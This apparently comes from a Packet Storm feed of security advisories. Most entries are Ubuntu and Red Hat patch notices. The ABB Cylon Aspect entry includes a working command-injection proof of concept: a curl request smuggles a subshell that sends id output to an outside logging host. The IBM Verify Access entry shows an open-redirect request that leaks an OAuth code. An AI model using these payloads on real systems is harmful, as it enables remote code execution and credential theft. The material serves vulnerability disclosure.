This Metasploit module uses a combination of an arbitrary file read (CVE-2024-34102) and a buffer overflow in glibc (CVE-2024-2961). It allows for unauthenticated remote code execution on various versions of Magento and Adobe Commerce (and earlier versions if the PHP and glibc versions are also vulnerable). Versions affected include 2.4.7 and earlier, 2.4.6-p5 and earlier, 2.4.5-p7 and earlier, and 2.4.4-p8 and earlier.

Magento / Adobe Commerce Remote Code Execution

ABB Cylon Aspect version 3.08.01 suffers from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the file HTTP POST parameter called by the databaseFileDelete.php script.

  
ABB Cylon Aspect 3.08.01 (databaseFileDelete.php) Remote Code Execution

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.08.01

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an unauthenticated OS command  
injection vulnerability. This can be exploited to inject and execute arbitrary  
shell commands through the 'file' HTTP POST parameter called by the databaseFileDelete.php  
script.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5845  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5845.php

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ 

$ curl -X POST "http://192.168.73.31/databaseFileDelete.php" \  
> -d "file2=$(curl -A \"`id`\" remotelog.zeroscience.mk)\  
> &delete2=1\  
> &total=3\  
> &submitDeleteForm=Delete" ; ./incom -l httplog &  
<META HTTP-EQUIV='Refresh' content='0;URL=databaseFile.php'>  
[1]  + 38937 done       incom

$ cat httplog  
------ remotelog ------  
GET / HTTP/1.1  
User-Agent: uid=48(apache) gid=48(apache) groups=48(apache),0(root)  
Host: remotelog.zeroscience.mk  
Accept: */*  
------ remotelog ------

ABB Cylon Aspect 3.08.01 databaseFileDelete.php Command Injection

IBM Security Verify Access versions 10.0.0 through 10.0.8 suffer from an OAUTH related open redirection vulnerability.

- IBM Security Verify Access >= 10.0.0 <= 10.0.8 - Open Redirect during  
OAuth Flow

======== < Table of Contents >  
================================================

  0. Overview  
  1. Detailed Description  
  2. Proof Of Concept  
  3. Solution  
  4. Disclosure Timeline  
  5. References  
  6. Credits  
  7. Legal Notices

======== < 0. Overview >  
======================================================

  Revision:  
    1.0

  Impact:  
    By persuading a victim to visit a specially crafted Web site, a remote  
    attacker could exploit this vulnerability to spoof the URL displayed  
    to redirect a user to a malicious Web site that would appear to be  
    trusted. This could allow the attacker to obtain highly sensitive  
    information or conduct further attacks against the victim.

  Severity:  
    NIST: High  
    IBM: Medium

  CVSS Score:  
    NIST 8.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)  
    IBM 6.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N)

  CVE-ID:  
    CVE-2024-35133

  Vendor:  
    IBM

  Affected Products:  
    IBM Security Verify Access  
    IBM Security Verify Access Docker

  Affected Versions:  
    10.0.0 - 10.0.8

  Product Description:

    IBM Security Verify Access is a complete authorization and network  
    security policy management solution. It provides end-to-end protection  
    of resources over geographically dispersed intranets and extranets.

    In addition to state-of-the-art security policy management, IBM Security  
    Verify Access provides authentication, authorization, data security, and  
    centralized resource management capabilities.

    IBM Security Verify Access offers the following features:  
    Authentication ~ Provides a wide range of built-in authenticators and  
    supports external authenticators.

    Authorization ~ Provides permit and deny decisions for protected  
resources  
    requests in the secure domain through the authorization API.

    Data security and centralized resource management ~ Manages secure  
access  
    to private internal network-based resources by using the public  
Internet's  
    broad connectivity and ease of use with a corporate firewall system.

======== < 1. Detailed Description >  
==========================================

  During a Penetration Test of the OAuth flow for a client, it was found an  
  Open Redirect vulnerability that can led to the leakage of the OAuth  
"code" variable.

  It was possible to bypass the parser's logic responsible for verifying the  
  correctness and the validity of the "redirect_uri" parameter during an  
OAuth  
  flow by leveraging RFC 3986 (3.2.1) providing a username and password  
directly  
  in the Uniform Resource Identifier (URI).

  By providing as the "username" field a legitimate and expected domain, it  
  was possible to bypass the whitelist filter used by "IBM Security Verify  
Access"  
  and cause an Open Redirect to any arbitrary domain controlled by the  
attacker,  
  not only altering the expected flow and redirect a user to a malicious  
  Web site that would appear to be trusted.

  This could allow the attacker to obtain highly sensitive like the OAuth  
"code"  
  token or conduct further attacks against the victim

======== < 2. Proof of Concepts >  
=============================================

===== REQUEST =====

[[  
  GET  
/oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=  
https://legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+  
HTTP/1.1  
  Host: [REDACTED]  
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101  
Firefox/115.0  
  Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
  Accept-Language: en-US,en;q=0.5  
  Accept-Encoding: gzip, deflate, br  
  Upgrade-Insecure-Requests: 1  
  Sec-Fetch-Dest: document  
  Sec-Fetch-Mode: navigate  
  Sec-Fetch-Site: same-origin  
  Sec-Fetch-User: ?1  
  Te: trailers  
  Connection: close  
]]

===== RESPONSE =====

[[  
  HTTP/1.1 302 Found  
  content-language: en-US  
  date: Tue, 19 Mar 2024 16:04:35 GMT  
  location:  
https://legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED]  
  p3p: CP="NON CUR OTPi OUR NOR UNI"  
  x-frame-options: DENY  
  x-content-type-options: nosniff  
  cache-control: no-store  
  x-xss-protection: 1; mode=block  
  x-permitted-cross-domain-policies: none  
  cross-origin-resource-policy: same-site  
  content-security-policy: frame-ancestors 'none'  
  referrer-policy: no-referrer-when-downgrade  
  strict-transport-security: max-age=31536000; includeSubDomains  
  pragma: no-cache  
  Content-Length: 0.  
]]

======== < 3. Solution >  
======================================================

  Refer to IBM Security Bulletin 7166712 for patch, upgrade or  
  suggested workaround information.

  See "References" for more details.

======== < 4. Disclosure Timeline >  
===========================================

  19/03/2024 - Vulnerability discovered by the Security Researcher (Giulio  
Garzia)  
  21/03/2024 - Vulnerability shared with the client who committed the  
Penetration Test on his infrastructure, relying on IBM SVA  
  02/04/2024 - Vulnerability shared with IBM  
  02/04/2024 - Vulnerability taken over by IBM  
  14/05/2024 - Vulnerability confirmed by IBM  
  18/07/2024 - Pre-release provided by IBM to the customer to verify the  
resolution of the vulnerability  
  27/08/2024 - Security Bulletin and vulnerability shared by IBM

======== < 5. References >  
====================================================

  (1)  
https://www.ibm.com/support/pages/security-bulletin-security-vulnerability-was-fixed-ibm-security-verify-access-cve-2024-35133  
  (2) https://exchange.xforce.ibmcloud.com/vulnerabilities/291026  
  (3) https://nvd.nist.gov/vuln/detail/CVE-2024-35133  
  (4) https://cwe.mitre.org/data/definitions/178.html

======== < 6. Credits >  
=======================================================

  This vulnerability was discovered and reported by:

    Giulio Garzia 'Ozozuz'

  Contacts:

    https://www.linkedin.com/in/giuliogarzia/  
    https://github.com/Ozozuz

======== < 7. Legal Notices >  
================================================

  Copyright (c) 2024 Giulio Garzia "Ozozuz"

  Permission is granted for the redistribution of this alert  
  electronically. It may not be edited in any way without mine express  
  written consent. If you wish to reprint the whole or any  
  part of this alert in any other medium other than electronically,  
  please email me for permission.

  Disclaimer: The information in the advisory is believed to be accurate  
  at the time of publishing based on currently available information.  
  Use of the information constitutes acceptance for use in an AS IS  
  condition.  
  There are no warranties with regard to this information. Neither the  
  author nor the publisher accepts any liability for any direct,  
  indirect, or consequential loss or damage arising from use of,  
  or reliance on,this information.

IBM Security Verify Access 10.0.8 Open Redirection

Ubuntu Security Notice 7076-1 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7076-1October 17, 2024linux-azure, linux-azure-5.15 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-azure-5.15: Linux kernel for Microsoft Azure cloud systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - Microsoft Azure Network Adapter (MANA) driver;  - Watchdog drivers;  - Netfilter;  - Network traffic control;(CVE-2024-27397, CVE-2024-45016, CVE-2024-45001, CVE-2024-38630)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS  linux-image-5.15.0-1074-azure   5.15.0-1074.83  linux-image-azure-lts-22.04     5.15.0.1074.72Ubuntu 20.04 LTS  linux-image-5.15.0-1074-azure   5.15.0-1074.83~20.04.1  linux-image-azure               5.15.0.1074.83~20.04.1  linux-image-azure-cvm           5.15.0.1074.83~20.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7076-1  CVE-2024-27397, CVE-2024-38630, CVE-2024-45001, CVE-2024-45016Package Information:  https://launchpad.net/ubuntu/+source/linux-azure/5.15.0-1074.83  https://launchpad.net/ubuntu/+source/linux-azure-5.15/5.15.0-1074.83~20.04.1

Ubuntu Security Notice USN-7076-1

Ubuntu Security Notice 7074-1 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7074-1October 17, 2024linux-azure vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure: Linux kernel for Microsoft Azure Cloud systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - Microsoft Azure Network Adapter (MANA) driver;  - Network traffic control;(CVE-2024-45016, CVE-2024-45001)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS  linux-image-6.8.0-1016-azure    6.8.0-1016.18  linux-image-6.8.0-1016-azure-fde  6.8.0-1016.18  linux-image-azure               6.8.0-1016.18  linux-image-azure-fde           6.8.0-1016.18After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7074-1  CVE-2024-45001, CVE-2024-45016Package Information:  https://launchpad.net/ubuntu/+source/linux-azure/6.8.0-1016.18

Ubuntu Security Notice USN-7074-1

Ubuntu Security Notice 7073-2 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7073-2October 17, 2024linux-azure, linux-azure-5.4 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-azure-5.4: Linux kernel for Microsoft Azure cloud systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - Watchdog drivers;  - Netfilter;  - Memory management;  - Network traffic control;(CVE-2024-27397, CVE-2024-38630, CVE-2024-45016, CVE-2024-26960)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  linux-image-5.4.0-1139-azure    5.4.0-1139.146  linux-image-azure-lts-20.04     5.4.0.1139.133Ubuntu 18.04 LTS  linux-image-5.4.0-1139-azure    5.4.0-1139.146~18.04.1                                  Available with Ubuntu Pro  linux-image-azure               5.4.0.1139.146~18.04.1                                  Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7073-2  https://ubuntu.com/security/notices/USN-7073-1  CVE-2024-26960, CVE-2024-27397, CVE-2024-38630, CVE-2024-45016Package Information:  https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1139.146

Ubuntu Security Notice USN-7073-2

Ubuntu Security Notice 7069-2 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7069-2October 17, 2024linux-azure vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 LTS- Ubuntu 14.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure: Linux kernel for Microsoft Azure Cloud systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - x86 architecture;  - Cryptographic API;  - CPU frequency scaling framework;  - HW tracing;  - ISDN/mISDN subsystem;  - Media drivers;  - Network drivers;  - NVME drivers;  - S/390 drivers;  - SCSI drivers;  - USB subsystem;  - VFIO drivers;  - Watchdog drivers;  - JFS file system;  - IRQ subsystem;  - Core kernel;  - Memory management;  - Amateur Radio drivers;  - IPv4 networking;  - IPv6 networking;  - IUCV driver;  - Network traffic control;  - TIPC protocol;  - XFRM subsystem;  - Integrity Measurement Architecture(IMA) framework;  - SoC Audio for Freescale CPUs drivers;  - USB sound devices;(CVE-2024-36971, CVE-2024-42271, CVE-2024-38630, CVE-2024-38602,CVE-2024-42223, CVE-2024-44940, CVE-2023-52528, CVE-2024-41097,CVE-2024-27051, CVE-2024-42157, CVE-2024-46673, CVE-2024-39494,CVE-2024-42089, CVE-2024-41073, CVE-2024-26810, CVE-2024-26960,CVE-2024-38611, CVE-2024-31076, CVE-2024-26754, CVE-2023-52510,CVE-2024-40941, CVE-2024-45016, CVE-2024-38627, CVE-2024-38621,CVE-2024-39487, CVE-2024-27436, CVE-2024-40901, CVE-2024-26812,CVE-2024-42244, CVE-2024-42229, CVE-2024-43858, CVE-2024-42280,CVE-2024-26641, CVE-2024-42284, CVE-2024-26602)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 LTS  linux-image-4.15.0-1182-azure   4.15.0-1182.197~16.04.1                                  Available with Ubuntu Pro  linux-image-azure               4.15.0.1182.197~16.04.1                                  Available with Ubuntu ProUbuntu 14.04 LTS  linux-image-4.15.0-1182-azure   4.15.0-1182.197~14.04.1                                  Available with Ubuntu Pro  linux-image-azure               4.15.0.1182.197~14.04.1                                  Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7069-2  https://ubuntu.com/security/notices/USN-7069-1  CVE-2023-52510, CVE-2023-52528, CVE-2024-26602, CVE-2024-26641,  CVE-2024-26754, CVE-2024-26810, CVE-2024-26812, CVE-2024-26960,  CVE-2024-27051, CVE-2024-27436, CVE-2024-31076, CVE-2024-36971,  CVE-2024-38602, CVE-2024-38611, CVE-2024-38621, CVE-2024-38627,  CVE-2024-38630, CVE-2024-39487, CVE-2024-39494, CVE-2024-40901,  CVE-2024-40941, CVE-2024-41073, CVE-2024-41097, CVE-2024-42089,  CVE-2024-42157, CVE-2024-42223, CVE-2024-42229, CVE-2024-42244,  CVE-2024-42271, CVE-2024-42280, CVE-2024-42284, CVE-2024-43858,  CVE-2024-44940, CVE-2024-45016, CVE-2024-46673

Ubuntu Security Notice USN-7069-2

Ubuntu Security Notice 7028-2 - It was discovered that the JFS file system contained an out-of-bounds read vulnerability when printing xattr debug information. A local attacker could use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7028-2October 17, 2024linux-azure vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 14.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure: Linux kernel for Microsoft Azure Cloud systemsDetails:It was discovered that the JFS file system contained an out-of-bounds readvulnerability when printing xattr debug information. A local attacker coulduse this to cause a denial of service (system crash).Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - GPU drivers;  - Greybus drivers;  - Modular ISDN driver;  - Multiple devices driver;  - Network drivers;  - SCSI drivers;  - VFIO drivers;  - F2FS file system;  - GFS2 file system;  - JFS file system;  - NILFS2 file system;  - Kernel debugger infrastructure;  - Bluetooth subsystem;  - IPv4 networking;  - L2TP protocol;  - Netfilter;  - RxRPC session sockets;(CVE-2024-42154, CVE-2023-52527, CVE-2024-26733, CVE-2024-42160,CVE-2021-47188, CVE-2024-38570, CVE-2024-26851, CVE-2024-26984,CVE-2024-26677, CVE-2024-39480, CVE-2024-27398, CVE-2022-48791,CVE-2024-42224, CVE-2024-38583, CVE-2024-40902, CVE-2023-52809,CVE-2024-39495, CVE-2024-26651, CVE-2024-26880, CVE-2024-42228,CVE-2024-27437, CVE-2022-48863)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 14.04 LTS  linux-image-4.15.0-1181-azure   4.15.0-1181.196~14.04.1                                  Available with Ubuntu Pro  linux-image-azure               4.15.0-1181.196~14.04.1                                  Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7028-2  https://ubuntu.com/security/notices/USN-7028-1  CVE-2021-47188, CVE-2022-48791, CVE-2022-48863, CVE-2023-52527,  CVE-2023-52809, CVE-2024-26651, CVE-2024-26677, CVE-2024-26733,  CVE-2024-26851, CVE-2024-26880, CVE-2024-26984, CVE-2024-27398,  CVE-2024-27437, CVE-2024-38570, CVE-2024-38583, CVE-2024-39480,  CVE-2024-39495, CVE-2024-40902, CVE-2024-42154, CVE-2024-42160,  CVE-2024-42224, CVE-2024-42228

Ubuntu Security Notice USN-7028-2

Ubuntu Security Notice 7059-2 - USN-7059-1 fixed a vulnerability in OATH Toolkit library. This update provides the corresponding update for Ubuntu 24.10. Fabian Vogt discovered that OATH Toolkit incorrectly handled file permissions. A remote attacker could possibly use this issue to overwrite root owned files, leading to a privilege escalation attack.

==========================================================================

Ubuntu Security Notice USN-7059-2  
October 17, 2024

oath-toolkit vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.10

Summary:

OATH Toolkit could be made to overwrite files as the administrator.

Software Description:  
- oath-toolkit: Development files for the OATH Toolkit Liboath library

Details:

USN-7059-1 fixed a vulnerability in OATH Toolkit library. This  
update provides the corresponding update for Ubuntu 24.10.

Original advisory details:

 Fabian Vogt discovered that OATH Toolkit incorrectly handled file  
 permissions. A remote attacker could possibly use this issue to  
 overwrite root owned files, leading to a privilege escalation attack.  
 (CVE-2024-47191)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.10  
  liboath-dev                     2.6.11-3ubuntu1

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-7059-2   
<https://ubuntu.com/security/notices/USN-7059-2>  
https://ubuntu.com/security/notices/USN-7059-1   
<https://ubuntu.com/security/notices/USN-7059-1>  
  CVE-2024-47191

Package Information:  
https://launchpad.net/ubuntu/+source/oath-toolkit/2.6.11-3ubuntu1   
<https://launchpad.net/ubuntu/+source/oath-toolkit/2.6.11-3ubuntu1>

Ubuntu Security Notice USN-7059-2

Red Hat Security Advisory 2024-8116-03 - An update for java-1.8.0-openjdk is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support. Issues addressed include buffer overflow and integer overflow vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8116.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: java-1.8.0-openjdk security update  
Advisory ID:        RHSA-2024:8116-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8116  
Issue date:         2024-10-17  
Revision:           03  
CVE Names:          CVE-2023-48161  
====================================================================

Summary: 

An update for java-1.8.0-openjdk is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit.

Security Fix(es):

* giflib: Heap-Buffer Overflow during Image Saving in DumpScreen2RGB Function (CVE-2023-48161)

* JDK: Array indexing integer overflow (8328544) (CVE-2024-21210)

* JDK: HTTP client improper handling of maxHeaderSize (8328286) (CVE-2024-21208)

* JDK: Unbounded allocation leads to out-of-memory error (8331446) (CVE-2024-21217)

* JDK: Integer conversion error leads to incorrect range check (8332644) (CVE-2024-21235)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-48161

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2251025  
https://bugzilla.redhat.com/show_bug.cgi?id=2318524  
https://bugzilla.redhat.com/show_bug.cgi?id=2318526  
https://bugzilla.redhat.com/show_bug.cgi?id=2318530  
https://bugzilla.redhat.com/show_bug.cgi?id=2318534  
https://issues.redhat.com/browse/RHEL-62293

Source

Packet Storm